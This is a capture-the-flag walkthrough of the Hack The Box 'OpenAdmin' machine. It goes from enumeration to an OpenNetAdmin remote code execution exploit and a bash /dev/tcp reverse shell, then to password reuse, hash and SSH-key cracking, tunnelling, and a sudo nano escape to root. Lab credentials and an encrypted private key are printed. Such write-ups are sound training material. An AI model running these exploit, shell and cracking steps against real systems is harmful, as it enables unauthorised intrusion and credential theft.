https://www.hackthebox.com/machines/OpenAdmin

OS: Linux

10.129.14.206

Credentials:

UsernamePasswordNotes/Hash
ona_sysn1nj4W4rri0R!database password
jimmyn1nj4W4rri0R!got a hint from 0xdf writeup to spray password
jimmyRevealedthe internal service password on unusual port
joannabloodninjascracked from ssh2john hash on rsa key revealed from unusual port

nmap results:

# Nmap 7.99 scan initiated Wed Jun 10 18:15:45 2026 as: /usr/lib/nmap/nmap -p- --open -sC -sV -A -vv -oA nmap/OpenAdmin 10.129.14.206
Nmap scan report for 10.129.14.206
Host is up, received reset ttl 63 (0.017s latency).
Scanned at 2026-06-10 18:15:46 EDT for 20s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VGHiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNKWaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2tPAFPpvipRrLE=
|   256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Attack + Enum Vectors

  • TCP 80: HTTP Apache httpd 2.4.29
  • TCP 22: SSH OpenSSH 7.6p1

UDP (161 SNMP)?

  • closed

Service Enum Notes:

Web Service: Gobuster / fuff

gobuster dir -u http://10.129.14.206 -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-big.txt -t 100 -r -exclude-length 0
music                (Status: 200) [Size: 12554]
artwork              (Status: 200) [Size: 14461]
sierra               (Status: 200) [Size: 43029]
server-status        (Status: 403) [Size: 278]
marga                (Status: 200) [Size: 18191]

viewing the sites, and:

http://10.129.14.206/music/

there’s a Login on the top right, clicking on it redirected to:

http://10.129.14.206/ona/

and hovering over the DOWNLOAD button reveals on the bottom left

https://opennetadmin.com/download.html

and showed version v18.1.1


Initial Foothold

searching google online:

open net admin exploit

we found an exploit on gitbhub, which is possible working exploit with version 8.5.14 <= 18.1.1 as vulnerable versions.

https://github.com/sec-it/OpenNetAdmin-RCE

cloning it and running:

ruby exploit.rb exploit http://10.129.14.206/ona/ id

we got output:

[+] Command output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

so we have an RCE, let’s get a shell. Set up a listener first:

sudo nc -lvnp 1337

then

ruby exploit.rb exploit http://10.129.14.206/ona/ "bash -c 'bash -i >& /dev/tcp/HTB_VPN_IP/1337 0>&1'"

Stabilizing the shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Ctrl + Z to background our shell

stty raw -echo;fg
reset

then enter my terminal size:

stty rows 48 cols 210

And now we have a fully functioning shell!


Priv Esc

cat /etc/passwd | grep -i "sh"
root:x:0:0:root:/root:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash

so jimmy and joanna are 2 valid users.

I transferred pspy64 to target and let’s view some interesting results:

2026/06/10 23:39:58 CMD: UID=0     PID=1      | /sbin/init auto automatic-ubiquity noprompt 
2026/06/10 23:40:31 CMD: UID=33    PID=15454  | php -l /opt/ona/www/local/config/database_settings.inc.php 
2026/06/10 23:40:31 CMD: UID=33    PID=15453  | sh -c php -l /opt/ona/www/local/config/database_settings.inc.php 
2026/06/10 23:40:31 CMD: UID=33    PID=15452  | /usr/sbin/apache2 -k start

so there is a database settings, let’s look at it:

cat /opt/ona/www/local/config/database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

and looking at listening ports:

ss -nptlu
Netid                  State                    Recv-Q                   Send-Q                                      Local Address:Port                                       Peer Address:Port                   
udp                    UNCONN                   0                        0                                           127.0.0.53%lo:53                                              0.0.0.0:*                      
udp                    UNCONN                   0                        0                                                 0.0.0.0:68                                              0.0.0.0:*                      
tcp                    LISTEN                   0                        128                                         127.0.0.53%lo:53                                              0.0.0.0:*                      
tcp                    LISTEN                   0                        128                                               0.0.0.0:22                                              0.0.0.0:*                      
tcp                    LISTEN                   0                        80                                              127.0.0.1:3306                                            0.0.0.0:*                      
tcp                    LISTEN                   0                        128                                             127.0.0.1:52846                                           0.0.0.0:*                      
tcp                    LISTEN                   0                        128                                                     *:80                                                    *:*                      
tcp                    LISTEN                   0                        128                                                  [::]:22                                                 [::]:* 

We see listening internally ports on 3306 which is possibly mysql, and an interesting one at 52846 which we might need to pivot internally to enumearte if nothing later.

Let’s first enumerate the mysql database with ona_sys:n1nj4W4rri0R!

mysql -u 'ona_sys' -h localhost -p'n1nj4W4rri0R!'

and we got in, show the databases:

show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ona_default        |
+--------------------+
2 rows in set (0.00 sec)

let’s enumerate ona_default

use ona_default;

and enumerate the tables:

show tables;
+------------------------+
| Tables_in_ona_default  |
+------------------------+
| blocks                 |
| configuration_types    |
| configurations         |
| custom_attribute_types |
| custom_attributes      |
| dcm_module_list        |
| device_types           |
| devices                |
| dhcp_failover_groups   |
| dhcp_option_entries    |
| dhcp_options           |
| dhcp_pools             |
| dhcp_server_subnets    |
| dns                    |
| dns_server_domains     |
| dns_views              |
| domains                |
| group_assignments      |
| groups                 |
| host_roles             |
| hosts                  |
| interface_clusters     |
| interfaces             |
| locations              |
| manufacturers          |
| messages               |
| models                 |
| ona_logs               |
| permission_assignments |
| permissions            |
| roles                  |
| sequences              |
| sessions               |
| subnet_types           |
| subnets                |
| sys_config             |
| tags                   |
| users                  |
| vlan_campuses          |
| vlans                  |
+------------------------+
40 rows in set (0.00 sec)

let’s look at users for now to see if there’s passwords:

select * from users;
+----+----------+----------------------------------+-------+---------------------+---------------------+
| id | username | password                         | level | ctime               | atime               |
+----+----------+----------------------------------+-------+---------------------+---------------------+
|  1 | guest    | 098f6bcd4621d373cade4e832627b4f6 |     0 | 2026-06-10 23:50:31 | 2026-06-10 23:50:31 |
|  2 | admin    | 21232f297a57a5a743894a0e4a801fc3 |     0 | 2007-10-30 03:00:17 | 2007-12-02 22:10:26 |
+----+----------+----------------------------------+-------+---------------------+---------------------+
2 rows in set (0.00 sec)

let’s copy the hashes to hashes.txt, and brute with john

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

failed appearantly? What about:

hashcat hashes.txt /usr/share/wordlists/rockyou.txt

select the lowest number one from detected:

hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

and we got:

21232f297a57a5a743894a0e4a801fc3:admin
098f6bcd4621d373cade4e832627b4f6:test

Oh dear, I probably fell in a rabbit hole. But let’s spray these passwords against jimmy and joanna anyway just in case, and spray their user names. However, nothing yields us interesting results to log in.

I then ran linpeass and got some interesting results, the port of 52846 is indeed an internally hosted server I believe. Then these information:

══╣ PHP exec extensions               
drwxr-xr-x 2 root root 4096 Nov 22  2019 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Nov 22  2019 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 32 Nov 22  2019 /etc/apache2/sites-enabled/internal.conf -> ../sites-available/internal.conf
Listen 127.0.0.1:52846                                                           
<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal
<IfModule mpm_itk_module>                     
AssignUserID joanna joanna  
</IfModule>
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

Let’s try to pivot internally

chisel server -p 9999 --reverse

then transfer chisel on to target and:

./chisel client HTB_VPN_IP:9999 R:8088:127.0.0.1:52846

but my version of chisel couldn’t launch on target, let me switch to ligolo: on kali

sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
sudo ligolo-proxy -selfcert

on kali:

sudo ip route add 240.0.0.1 dev ligolo

Then transfer ligolo agent to target

./agent -connect HTB_VPN_IP:11601 -ignore-cert

then on ligolo interface:

session
1
start

then let’s browse to:

http://240.0.0.1:52846/

appearantly we need password and username?

I got a little stuck here and took a glace at 0xdf write up and concluded i actually forgot to re-use the password n1nj4W4rri0R! on jimmy, and we got shell as jimmy

As jimmy, we can finally view /var/www/internal:

grep -ri "password"

and we found a hash:

index.php:              if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {

let’s try to crack the hash:

hashcat -m 1700 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best66.rule

got:

00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1:Revealed

and with pivoting on:

http://240.0.0.1:52846/

we logged in with jimmy:Revealed: found a ssh private rsa key and a hint to Don't forget your "ninja" password:

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----

copy that to our id_rsa file and ensure correct perms:

chmod 400 id_rsa

then let’s try ssh to joanna user:

ssh -i id_rsa [email protected]

and prompted to ask us:

Enter passphrase for key 'id_rsa':

I tried Revealed, Ninja, n1nj4W4rri0R! all didn’t work, well let’s john it:

ssh2john id_rsa > ssh_hash.txt

and

john --wordlist=/usr/share/wordlists/rockyou.txt ssh_hash.txt

yields:

bloodninjas      (id_rsa)

perfect, let’s try ssh again:

ssh -i id_rsa [email protected]

and we logged in as joanna!

sudo -l

we have:

Matching Defaults entries for joanna on openadmin:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

then using the https://gtfobins.org/gtfobins/nano/ trick:

/bin/nano /opt/priv

presss Ctrl + R and then Ctrl + X: then enter:

reset; bash 1>&0 2>&0

and our bash got weird:

reset

again, now we are root!

Therefore, pwn’d.


Conclusion & Remediation

In my personal opinion, I really liked this box as it challenges password attacks of people trying to solve the box. The enumerations weren’t too complicated but the review on spraying passwords on every single user and service is still a very valid and important concepts.

To remediate from similiar attacks assembled in this lab: system administrators must update their outdated web services to the earliest, or at least try to implement access control and hide it from normal users if updating cannot be done immediately. In addition, users should not be using the same password they have on one service as their own user’s log in password. Similarly, passwords should create as complicated and complex as possible to prevent attackers from easily gaining access by brute forcing hashes if they did gain access. Lastly, misconfigured sudo privileges needs to be removed following the principle of least privileges.